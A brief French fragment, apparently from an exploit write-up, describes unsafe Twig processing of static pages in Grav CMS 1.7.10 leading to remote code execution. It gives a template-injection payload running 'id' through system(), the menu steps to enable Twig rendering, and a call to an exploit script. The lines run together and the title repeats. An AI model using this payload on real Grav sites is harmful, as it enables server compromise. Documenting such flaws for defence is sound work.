
Traitement non sécurisé de Twig des pages statiques conduisant à une RCE dans Grav CMS 1.7.10
Traitement non sécurisé de Twig des pages statiques menant à une exécution de code à distance (RCE) dans Grav CMS 1.7.10
{{ system("id") }} puis activons le rendu Twig : Advanced --> Process --> Twig (enable)python3 exploit.py